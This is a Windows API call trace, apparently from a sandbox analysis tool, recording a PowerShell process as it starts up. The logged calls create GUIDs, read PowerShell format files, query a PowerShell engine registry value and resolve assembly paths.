	[0089.042] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x5acabd2f, Data2=0x6c95, Data3=0x43eb, Data4=([0]=0xb8, [1]=0xf9, [2]=0x81, [3]=0x5, [4]=0x45, [5]=0x3b, [6]=0x39, [7]=0x4))) returned 0x0
	[0089.042] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xa479e686, Data2=0xb03, Data3=0x4b80, Data4=([0]=0x96, [1]=0x8a, [2]=0x72, [3]=0xf8, [4]=0x4f, [5]=0x6a, [6]=0x9a, [7]=0xa5))) returned 0x0
	[0089.042] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x30327dd9, Data2=0x22e2, Data3=0x48d7, Data4=([0]=0xb4, [1]=0x92, [2]=0x16, [3]=0xc5, [4]=0xa2, [5]=0xb3, [6]=0x5e, [7]=0x66))) returned 0x0
	[0089.042] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xcbbb9ede, Data2=0x56f, Data3=0x4843, Data4=([0]=0x81, [1]=0x19, [2]=0x41, [3]=0xa, [4]=0xe0, [5]=0x97, [6]=0x25, [7]=0x6))) returned 0x0
	[0089.043] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x601119cc, Data2=0x16b3, Data3=0x4cda, Data4=([0]=0xa3, [1]=0x2, [2]=0xa6, [3]=0x96, [4]=0x7b, [5]=0xc8, [6]=0x25, [7]=0xb8))) returned 0x0
	[0089.043] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xc5ad57a4, Data2=0xf954, Data3=0x45ed, Data4=([0]=0x8a, [1]=0x78, [2]=0x39, [3]=0x90, [4]=0xfc, [5]=0x9b, [6]=0xcc, [7]=0x8c))) returned 0x0
	[0089.043] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xa8ed4ab2, Data2=0xf798, Data3=0x4f73, Data4=([0]=0x9a, [1]=0x59, [2]=0x60, [3]=0xd5, [4]=0x2c, [5]=0x56, [6]=0x99, [7]=0xc8))) returned 0x0
	[0089.043] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x86c0ce62, Data2=0x594e, Data3=0x4216, Data4=([0]=0xb1, [1]=0xb5, [2]=0x90, [3]=0x67, [4]=0x89, [5]=0x62, [6]=0x3d, [7]=0x53))) returned 0x0
	[0089.043] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x91f64c7b, Data2=0xfae9, Data3=0x47c8, Data4=([0]=0x81, [1]=0x3, [2]=0x79, [3]=0x3f, [4]=0x8f, [5]=0x11, [6]=0x95, [7]=0xf9))) returned 0x0
	[0089.043] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x910e3ec4, Data2=0xd327, Data3=0x4186, Data4=([0]=0x96, [1]=0xaf, [2]=0x4f, [3]=0xeb, [4]=0xfb, [5]=0xa6, [6]=0x93, [7]=0x5))) returned 0x0
	[0089.044] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xeb4bd324, Data2=0xe24c, Data3=0x4040, Data4=([0]=0xa8, [1]=0x5f, [2]=0x3b, [3]=0x59, [4]=0x1b, [5]=0xf4, [6]=0xb2, [7]=0xfc))) returned 0x0
	[0089.044] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x43ebb08b, Data2=0xef47, Data3=0x40a4, Data4=([0]=0xa5, [1]=0xbe, [2]=0x3a, [3]=0x87, [4]=0x11, [5]=0xd8, [6]=0x94, [7]=0xa2))) returned 0x0
	[0089.044] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xcfab1c54, Data2=0x7cb6, Data3=0x4f8b, Data4=([0]=0xb7, [1]=0x52, [2]=0x6d, [3]=0xf, [4]=0x86, [5]=0x5e, [6]=0x4b, [7]=0x1c))) returned 0x0
	[0089.044] VirtualQuery (in: lpAddress=0x14d4e0, lpBuffer=0x14e4e0, dwLength=0x1c | out: lpBuffer=0x14e4e0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.045] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xaaecd07d, Data2=0xa7be, Data3=0x416f, Data4=([0]=0x9e, [1]=0xe5, [2]=0x1b, [3]=0xd9, [4]=0x28, [5]=0x9a, [6]=0xee, [7]=0xa3))) returned 0x0
	[0089.045] VirtualQuery (in: lpAddress=0x14d4e0, lpBuffer=0x14e4e0, dwLength=0x1c | out: lpBuffer=0x14e4e0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.049] VirtualQuery (in: lpAddress=0x14d4e0, lpBuffer=0x14e4e0, dwLength=0x1c | out: lpBuffer=0x14e4e0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.053] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xeceb42aa, Data2=0x11b8, Data3=0x4443, Data4=([0]=0x83, [1]=0x1e, [2]=0x8e, [3]=0xbe, [4]=0x87, [5]=0x55, [6]=0x82, [7]=0x67))) returned 0x0
	[0089.053] VirtualQuery (in: lpAddress=0x14d4e0, lpBuffer=0x14e4e0, dwLength=0x1c | out: lpBuffer=0x14e4e0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.053] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x1ca91c73, Data2=0x30c9, Data3=0x4cc5, Data4=([0]=0x88, [1]=0xaf, [2]=0x7, [3]=0xde, [4]=0xca, [5]=0xae, [6]=0x32, [7]=0x56))) returned 0x0
	[0089.054] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x9614800c, Data2=0xd4c2, Data3=0x4dfb, Data4=([0]=0xb0, [1]=0x11, [2]=0x7d, [3]=0xf, [4]=0xe5, [5]=0x82, [6]=0xa, [7]=0x7c))) returned 0x0
	[0089.054] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x8917f2a, Data2=0xbdc6, Data3=0x4ace, Data4=([0]=0xac, [1]=0xfa, [2]=0xa3, [3]=0xf0, [4]=0x54, [5]=0x26, [6]=0x9, [7]=0x53))) returned 0x0
	[0089.054] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x27b7caff, Data2=0xdd97, Data3=0x4b43, Data4=([0]=0x9d, [1]=0xf7, [2]=0x9b, [3]=0xc5, [4]=0x18, [5]=0x34, [6]=0x53, [7]=0xb5))) returned 0x0
	[0089.054] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x9f6264ad, Data2=0x2bbd, Data3=0x4f6a, Data4=([0]=0x9c, [1]=0x5b, [2]=0x4d, [3]=0xcb, [4]=0xc9, [5]=0x79, [6]=0x50, [7]=0xed))) returned 0x0
	[0089.054] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x3ccd9158, Data2=0x9aa, Data3=0x4388, Data4=([0]=0xb9, [1]=0x9e, [2]=0x53, [3]=0x32, [4]=0xed, [5]=0x4, [6]=0xd2, [7]=0xdf))) returned 0x0
	[0089.054] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x30495d18, Data2=0x95e8, Data3=0x4cca, Data4=([0]=0xb5, [1]=0xea, [2]=0x70, [3]=0xeb, [4]=0x2e, [5]=0x6d, [6]=0xed, [7]=0x1d))) returned 0x0
	[0089.055] VirtualQuery (in: lpAddress=0x14d4c0, lpBuffer=0x14e4c0, dwLength=0x1c | out: lpBuffer=0x14e4c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.055] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xe7cc63d7, Data2=0xa1f9, Data3=0x4e0e, Data4=([0]=0xa3, [1]=0x60, [2]=0x5a, [3]=0xc3, [4]=0x21, [5]=0xdf, [6]=0x6a, [7]=0x19))) returned 0x0
	[0089.055] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x30d87ddf, Data2=0xa4b, Data3=0x4795, Data4=([0]=0x92, [1]=0xbc, [2]=0x11, [3]=0x14, [4]=0xa6, [5]=0x42, [6]=0x64, [7]=0x6f))) returned 0x0
	[0089.056] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x934761b7, Data2=0x5347, Data3=0x46c7, Data4=([0]=0x8a, [1]=0x62, [2]=0x8d, [3]=0xae, [4]=0xda, [5]=0x47, [6]=0xd8, [7]=0x42))) returned 0x0
	[0089.056] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x7cd6042a, Data2=0x68d2, Data3=0x4d60, Data4=([0]=0xbb, [1]=0x2b, [2]=0x89, [3]=0xf0, [4]=0xc3, [5]=0x34, [6]=0x91, [7]=0xc9))) returned 0x0
	[0089.056] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x90915d25, Data2=0x713b, Data3=0x47d7, Data4=([0]=0x87, [1]=0x39, [2]=0x6a, [3]=0xf5, [4]=0xce, [5]=0xa, [6]=0x40, [7]=0xd8))) returned 0x0
	[0089.056] VirtualQuery (in: lpAddress=0x14d4c0, lpBuffer=0x14e4c0, dwLength=0x1c | out: lpBuffer=0x14e4c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.056] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xbe23bfd4, Data2=0xa494, Data3=0x4200, Data4=([0]=0x9a, [1]=0x5a, [2]=0xe3, [3]=0x9d, [4]=0xb4, [5]=0x75, [6]=0x20, [7]=0x91))) returned 0x0
	[0089.056] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xa99847b5, Data2=0xaf2, Data3=0x44b9, Data4=([0]=0x94, [1]=0x9b, [2]=0x68, [3]=0x2e, [4]=0x36, [5]=0x54, [6]=0x2d, [7]=0x62))) returned 0x0
	[0089.057] VirtualQuery (in: lpAddress=0x14d4e8, lpBuffer=0x14e4e8, dwLength=0x1c | out: lpBuffer=0x14e4e8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.057] VirtualQuery (in: lpAddress=0x14d4e8, lpBuffer=0x14e4e8, dwLength=0x1c | out: lpBuffer=0x14e4e8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.057] VirtualQuery (in: lpAddress=0x14d4e8, lpBuffer=0x14e4e8, dwLength=0x1c | out: lpBuffer=0x14e4e8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.057] VirtualQuery (in: lpAddress=0x14d4e8, lpBuffer=0x14e4e8, dwLength=0x1c | out: lpBuffer=0x14e4e8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e22c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0089.057] GetLastError () returned 0x0
	[0089.057] SetErrorMode (uMode=0x1) returned 0x1
	[0089.057] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x29c
	[0089.058] GetLastError () returned 0x0
	[0089.058] GetFileType (hFile=0x29c) returned 0x1
	[0089.058] SetErrorMode (uMode=0x1) returned 0x1
	[0089.058] GetFileType (hFile=0x29c) returned 0x1
	[0089.058] ReadFile (in: hFile=0x29c, lpBuffer=0x1c8e148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1c8e148*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0089.059] GetLastError () returned 0x0
	[0089.059] ReadFile (in: hFile=0x29c, lpBuffer=0x1c8e148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1c8e148*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0089.059] GetLastError () returned 0x0
	[0089.060] ReadFile (in: hFile=0x29c, lpBuffer=0x1c8e148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1c8e148*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0089.060] GetLastError () returned 0x0
	[0089.060] ReadFile (in: hFile=0x29c, lpBuffer=0x1c8e148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1c8e148*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0089.060] GetLastError () returned 0x0
	[0089.061] ReadFile (in: hFile=0x29c, lpBuffer=0x1c8e148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1c8e148*, lpNumberOfBytesRead=0x14e794*=0x8b4, lpOverlapped=0x0) returned 1
	[0089.061] GetLastError () returned 0x0
	[0089.061] ReadFile (in: hFile=0x29c, lpBuffer=0x1c8d59c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1c8d59c*, lpNumberOfBytesRead=0x14e794*=0x0, lpOverlapped=0x0) returned 1
	[0089.061] GetLastError () returned 0x0
	[0089.061] ReadFile (in: hFile=0x29c, lpBuffer=0x1c8e148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1c8e148*, lpNumberOfBytesRead=0x14e794*=0x0, lpOverlapped=0x0) returned 1
	[0089.061] GetLastError () returned 0x0
	[0089.061] CloseHandle (hObject=0x29c) returned 1
	[0089.062] GetLastError () returned 0x0
	[0089.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e2f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0089.062] GetLastError () returned 0x0
	[0089.062] SetErrorMode (uMode=0x1) returned 0x1
	[0089.062] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1caf144 | out: lpFileInformation=0x1caf144*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0089.062] GetLastError () returned 0x0
	[0089.062] SetErrorMode (uMode=0x1) returned 0x1
	[0089.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0089.062] GetLastError () returned 0x0
	[0089.062] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e718 | out: phkResult=0x14e718*=0x29c) returned 0x0
	[0089.062] RegQueryValueExW (in: hKey=0x29c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e760, lpData=0x0, lpcbData=0x14e75c*=0x0 | out: lpType=0x14e760*=0x1, lpData=0x0, lpcbData=0x14e75c*=0x56) returned 0x0
	[0089.062] RegQueryValueExW (in: hKey=0x29c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e760, lpData=0x361778, lpcbData=0x14e75c*=0x56 | out: lpType=0x14e760*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14e75c*=0x56) returned 0x0
	[0089.062] RegCloseKey (hKey=0x29c) returned 0x0
	[0089.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0089.062] GetLastError () returned 0x0
	[0089.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0089.062] GetLastError () returned 0x0
	[0089.063] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x2f85f0e5, Data2=0xf85c, Data3=0x4963, Data4=([0]=0xbd, [1]=0xb1, [2]=0xb6, [3]=0x6e, [4]=0x50, [5]=0xc3, [6]=0x3, [7]=0xac))) returned 0x0
	[0089.064] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x55c98cf6, Data2=0x3f2c, Data3=0x4acf, Data4=([0]=0x96, [1]=0x6d, [2]=0xce, [3]=0x1d, [4]=0xe0, [5]=0xf2, [6]=0x4b, [7]=0x99))) returned 0x0
	[0089.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e22c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0089.064] GetLastError () returned 0x0
	[0089.064] SetErrorMode (uMode=0x1) returned 0x1
	[0089.064] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x29c
	[0089.064] GetLastError () returned 0x0
	[0089.064] GetFileType (hFile=0x29c) returned 0x1
	[0089.064] SetErrorMode (uMode=0x1) returned 0x1
	[0089.064] GetFileType (hFile=0x29c) returned 0x1
	[0089.064] ReadFile (in: hFile=0x29c, lpBuffer=0x1cc5054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1cc5054*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0089.065] GetLastError () returned 0x0
	[0089.066] ReadFile (in: hFile=0x29c, lpBuffer=0x1cc5054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1cc5054*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0089.066] GetLastError () returned 0x0
	[0089.066] ReadFile (in: hFile=0x29c, lpBuffer=0x1cc5054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1cc5054*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0089.066] GetLastError () returned 0x0
	[0089.066] ReadFile (in: hFile=0x29c, lpBuffer=0x1cc5054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1cc5054*, lpNumberOfBytesRead=0x14e794*=0x1000, lpOverlapped=0x0) returned 1
	[0089.066] GetLastError () returned 0x0
	[0089.067] ReadFile (in: hFile=0x29c, lpBuffer=0x1cc5054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1cc5054*, lpNumberOfBytesRead=0x14e794*=0xe98, lpOverlapped=0x0) returned 1
	[0089.067] GetLastError () returned 0x0
	[0089.067] ReadFile (in: hFile=0x29c, lpBuffer=0x1cc468c, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1cc468c*, lpNumberOfBytesRead=0x14e794*=0x0, lpOverlapped=0x0) returned 1
	[0089.067] GetLastError () returned 0x0
	[0089.067] ReadFile (in: hFile=0x29c, lpBuffer=0x1cc5054, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e794, lpOverlapped=0x0 | out: lpBuffer=0x1cc5054*, lpNumberOfBytesRead=0x14e794*=0x0, lpOverlapped=0x0) returned 1
	[0089.067] GetLastError () returned 0x0
	[0089.067] CloseHandle (hObject=0x29c) returned 1
	[0089.068] GetLastError () returned 0x0
	[0089.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e2f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0089.068] GetLastError () returned 0x0
	[0089.068] SetErrorMode (uMode=0x1) returned 0x1
	[0089.068] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ce6050 | out: lpFileInformation=0x1ce6050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0089.068] GetLastError () returned 0x0
	[0089.068] SetErrorMode (uMode=0x1) returned 0x1
	[0089.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0089.068] GetLastError () returned 0x0
	[0089.068] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e718 | out: phkResult=0x14e718*=0x29c) returned 0x0
	[0089.068] RegQueryValueExW (in: hKey=0x29c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e760, lpData=0x0, lpcbData=0x14e75c*=0x0 | out: lpType=0x14e760*=0x1, lpData=0x0, lpcbData=0x14e75c*=0x56) returned 0x0
	[0089.068] RegQueryValueExW (in: hKey=0x29c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e760, lpData=0x361778, lpcbData=0x14e75c*=0x56 | out: lpType=0x14e760*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14e75c*=0x56) returned 0x0
	[0089.068] RegCloseKey (hKey=0x29c) returned 0x0
	[0089.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0089.068] GetLastError () returned 0x0
	[0089.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e254, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0089.068] GetLastError () returned 0x0
	[0089.069] VirtualQuery (in: lpAddress=0x14d470, lpBuffer=0x14e470, dwLength=0x1c | out: lpBuffer=0x14e470*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.070] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x70beeb1c, Data2=0x8c4a, Data3=0x48fc, Data4=([0]=0x84, [1]=0x14, [2]=0x21, [3]=0xa, [4]=0xd5, [5]=0xd4, [6]=0xf7, [7]=0xdb))) returned 0x0
	[0089.070] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xd89dee2d, Data2=0xf795, Data3=0x40b0, Data4=([0]=0x96, [1]=0x6f, [2]=0x12, [3]=0xa1, [4]=0xef, [5]=0x7f, [6]=0x2d, [7]=0x67))) returned 0x0
	[0089.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14e460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0089.103] GetLastError () returned 0x57
	[0089.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14e460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0089.104] GetLastError () returned 0x57
	[0089.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14e460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0089.115] GetLastError () returned 0x57
	[0089.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14e460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0089.115] GetLastError () returned 0x57
